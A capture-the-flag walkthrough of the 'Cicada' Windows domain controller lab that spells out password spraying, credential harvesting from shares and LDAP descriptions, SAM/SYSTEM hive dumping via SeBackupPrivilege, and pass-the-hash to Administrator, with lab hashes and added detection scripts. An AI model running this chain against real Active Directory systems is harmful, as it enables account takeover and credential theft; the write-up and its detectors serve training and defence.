Cicada

OS: Windows
Difficulty: Easy
Points: 20

Nmap Scan

nmap -v -p- --min-rate=5000 10.129.136.189
nmap -vvv -p 53,88,135,139,389,445,464,636,3268,3269,5985 -sV -sC -oN nmap.txt 10.129.136.189
Nmap scan report for 10.129.136.189
Host is up (0.026s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-01 14:21:31Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

┌──(root㉿kali)-[~/Cicada]
└─# smbclient -L 10.129.136.189  
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      
        HR              Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share
┌──(root㉿kali)-[~/Cicada]
└─# smbclient //10.129.136.189/HR 
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 08:29:09 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024

                4168447 blocks of size 4096. 332850 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (11.2 KiloBytes/sec) (average 11.2 KiloBytes/sec)
smb: \> exit

The file contains a password.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

We enumerate domain users with netexec.

┌──(root㉿kali)-[~/Cicada]
└─# netexec smb 10.129.136.189 -u 'support' -p '' --rid-brute
SMB         10.129.136.189  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.136.189  445    CICADA-DC        [+] cicada.htb\support: 
SMB         10.129.136.189  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.136.189  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.136.189  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.136.189  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.136.189  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.136.189  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.136.189  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.136.189  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.136.189  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.136.189  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.136.189  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.136.189  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.136.189  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.136.189  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.136.189  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

We password spray the users with the password from the HR notice.

┌──(root㉿kali)-[~/Cicada]
└─# netexec smb 10.129.136.189 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB         10.129.136.189  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.136.189  445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.136.189  445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.136.189  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
michael.wrightson : Cicada$M6Corpb*@Lp#nZp!8
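The spray above leaves a very recognisable trace on the domain controller: one source failing against several accounts within seconds and then succeeding against one. The following detector is an added example, not part of the original writeup; it runs over constructed, simplified logon records (4625 failure / 4624 success with a source address) rather than real event-log telemetry.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security log records (not telemetry from the box):
# 4625 = failed logon, 4624 = successful logon, "src" = the workstation/IP
# address field. The first source replays the netexec spray above: one
# password against several accounts within two seconds, with a single hit.
SAMPLE_LOGON_EVENTS = [
    {"time": "2024-10-01T14:30:01", "id": 4625, "user": "john.smoulder", "src": "10.10.14.5"},
    {"time": "2024-10-01T14:30:01", "id": 4625, "user": "sarah.dantelia", "src": "10.10.14.5"},
    {"time": "2024-10-01T14:30:02", "id": 4624, "user": "michael.wrightson", "src": "10.10.14.5"},
    {"time": "2024-10-01T14:30:02", "id": 4625, "user": "david.orelious", "src": "10.10.14.5"},
    # a user mistyping once and then logging in is not a spray
    {"time": "2024-10-01T09:12:44", "id": 4625, "user": "emily.oscars", "src": "10.129.136.50"},
    {"time": "2024-10-01T09:13:10", "id": 4624, "user": "emily.oscars", "src": "10.129.136.50"},
]


def detect_password_spray(events, window_seconds=60, min_users=3):
    """One alert per source that fails against at least min_users distinct
    accounts inside a sliding window, plus any success inside that window."""
    window = timedelta(seconds=window_seconds)
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_src[e["src"]].append(dict(e, ts=datetime.fromisoformat(e["time"])))
    alerts = []
    for src, evs in by_src.items():
        failures = [e for e in evs if e["id"] == 4625]
        for i, first in enumerate(failures):
            end = first["ts"] + window
            sprayed = {e["user"] for e in failures[i:] if e["ts"] <= end}
            if len(sprayed) < min_users:
                continue
            hits = {e["user"] for e in evs
                    if e["id"] == 4624 and first["ts"] <= e["ts"] <= end}
            alerts.append({"src": src, "failed_users": sorted(sprayed),
                           "succeeded_users": sorted(hits)})
            break  # one alert per source is enough
    return alerts
```

A success listed in succeeded_users right after a burst of failures from the same source is the account to treat as compromised first.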

With these credentials we can enumerate the LDAP service.

┌──(root㉿kali)-[~/Cicada]
└─# netexec ldap 10.129.136.189 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         10.129.136.189  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.129.136.189  389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.129.136.189  389    CICADA-DC        [*] Total records returned: 8
LDAP        10.129.136.189  389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-                                               
LDAP        10.129.136.189  389    CICADA-DC        Administrator                 2024-08-26 20:08:03 1       Built-in account for administering the computer/domain      
LDAP        10.129.136.189  389    CICADA-DC        Guest                         2024-08-28 17:26:56 0       Built-in account for guest access to the computer/domain    
LDAP        10.129.136.189  389    CICADA-DC        krbtgt                        2024-03-14 11:14:10 0       Key Distribution Center Service Account                     
LDAP        10.129.136.189  389    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 1                                                                   
LDAP        10.129.136.189  389    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 1                                                                   
LDAP        10.129.136.189  389    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0                                                                   
LDAP        10.129.136.189  389    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3         
LDAP        10.129.136.189  389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0

We obtain another password from a user's description field.

david.orelious : aRt$Lp#7t*VQ!3
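The description attribute is readable by every authenticated domain user, so a password stored there is effectively public. The auditor below is an added example, not part of the writeup; it runs over constructed (username, description) pairs in the shape of the netexec --users table above (one line copies the david.orelious description) and flags descriptions that carry a credential-like token after a password keyword.

```python
import re

# Constructed user entries mirroring the --users columns above, not a live
# LDAP query. The david.orelious line is the description that leaked on this box.
SAMPLE_USERS = [
    ("Administrator", "Built-in account for administering the computer/domain"),
    ("krbtgt", "Key Distribution Center Service Account"),
    ("david.orelious", "Just in case I forget my password is aRt$Lp#7t*VQ!3"),
    ("svc_sql", "pwd: Summer2024! (rotate quarterly)"),
    ("helpdesk", "Contact helpdesk for password resets"),
]

# a password keyword, an optional "is" / ":" / "=", then the candidate token
LEAK_RE = re.compile(
    r"\b(?:password|passwd|pwd|pass|secret|creds?)\b\s*(?:is|:|=)?\s*(\S{6,})",
    re.IGNORECASE,
)


def looks_like_secret(token):
    """Require at least two character classes so that ordinary prose after the
    keyword ("password resets") is not reported."""
    classes = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")
    return sum(1 for c in classes if re.search(c, token)) >= 2


def find_description_leaks(users):
    """Return (username, candidate_secret) for every suspicious description."""
    leaks = []
    for name, desc in users:
        for m in LEAK_RE.finditer(desc):
            if looks_like_secret(m.group(1)):
                leaks.append((name, m.group(1)))
    return leaks
```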

Now we can access the DEV share.

┌──(root㉿kali)-[~/Cicada]
└─# smbclient -U 'david.orelious' //10.129.136.189/DEV
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 08:31:39 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 13:28:22 2024

                4168447 blocks of size 4096. 331615 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (5.1 KiloBytes/sec) (average 5.1 KiloBytes/sec)
smb: \>
┌──(root㉿kali)-[~/Cicada]
└─# cat Backup_script.ps1                                  

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

The script contains a hardcoded credential for a new account, and with it we can connect remotely.

┌──(root㉿kali)-[~/Cicada]
└─# evil-winrm -i 10.129.136.189 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'        
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type ..\Desktop\user.txt
a3b2112b2526c894eaf0ba7e71fc99fe

Privilege Escalation

The user holds SeBackupPrivilege, which lets us copy the registry hives and extract password hashes from them.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We save the SAM and SYSTEM hives.

*Evil-WinRM* PS C:\> mkdir temp


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         10/1/2024   8:37 AM                temp


*Evil-WinRM* PS C:\> reg save hklm\sam c:\temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\> reg save hklm\system c:\temp\system
The operation completed successfully.

We download them.

*Evil-WinRM* PS C:\> download c:\temp\sam .
                                        
Info: Downloading c:\temp\sam to sam
                                        
Info: Download successful!
*Evil-WinRM* PS C:\> download c:\temp\system .
                                        
Info: Downloading c:\temp\system to system
                                        
Info: Download successful!

Using pypykatz we obtain the hashes.

pypykatz registry --sam sam system
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
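The whole chain above (reg save of SAM and SYSTEM, offline parsing with pypykatz) shows up in process-creation telemetry as reg.exe writing credential-bearing hives to disk. The detector below is an added example, not from the writeup; it runs over constructed 4688 / Sysmon EID 1 style records, two of which mirror the reg save commands run above.

```python
import re

# Constructed process-creation records (Security 4688 / Sysmon EID 1 style),
# not real telemetry from the box. Entries 2 and 3 mirror the commands above.
SAMPLE_PROC_EVENTS = [
    {"user": "CICADA\\emily.oscars", "cmd": r"whoami /priv"},
    {"user": "CICADA\\emily.oscars", "cmd": r"reg save hklm\sam c:\temp\sam"},
    {"user": "CICADA\\emily.oscars", "cmd": r"reg  save HKLM\SYSTEM c:\temp\system"},
    {"user": "CICADA\\svc_backup", "cmd": r'"C:\Windows\system32\reg.exe" export HKLM\Software\App settings.reg'},
    {"user": "NT AUTHORITY\\SYSTEM", "cmd": r"C:\Windows\System32\reg.exe save HKLM\SECURITY \\?\C:\shadow\security.hiv"},
]

# reg or reg.exe (bare or full path, optionally quoted), then save/export,
# then a SAM, SYSTEM or SECURITY hive under HKLM; everything case-insensitive
HIVE_DUMP_RE = re.compile(
    r"""(?:^|[\\\s"])reg(?:\.exe)?"?\s+(?:save|export)\s+"?hklm\\(sam|system|security)\b""",
    re.IGNORECASE,
)


def find_hive_dumps(events):
    """Return (user, hive, command_line) for every record whose command line
    saves a credential-bearing registry hive to a file."""
    hits = []
    for e in events:
        m = HIVE_DUMP_RE.search(e["cmd"])
        if m:
            hits.append((e["user"], m.group(1).upper(), e["cmd"]))
    return hits


def users_dumping_both_hives(events):
    """SAM is useless without the boot key from SYSTEM (the pypykatz run above
    needs both), so a user saving both is the strongest signal."""
    per_user = {}
    for user, hive, _ in find_hive_dumps(events):
        per_user.setdefault(user, set()).add(hive)
    return sorted(u for u, hives in per_user.items() if {"SAM", "SYSTEM"} <= hives)
```

Pair a hit with the 4672 special-privileges event for the same logon to confirm the account actually held SeBackupPrivilege at the time.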

We connect over WinRM with the Administrator hash to get root.

┌──(root㉿kali)-[~/Cicada]
└─# evil-winrm -i 10.129.136.189 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\desktop\root.txt
9aab554ab6ae2f802622addf8afb426b

References

https://github.com/Pennyw0rth/NetExec
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/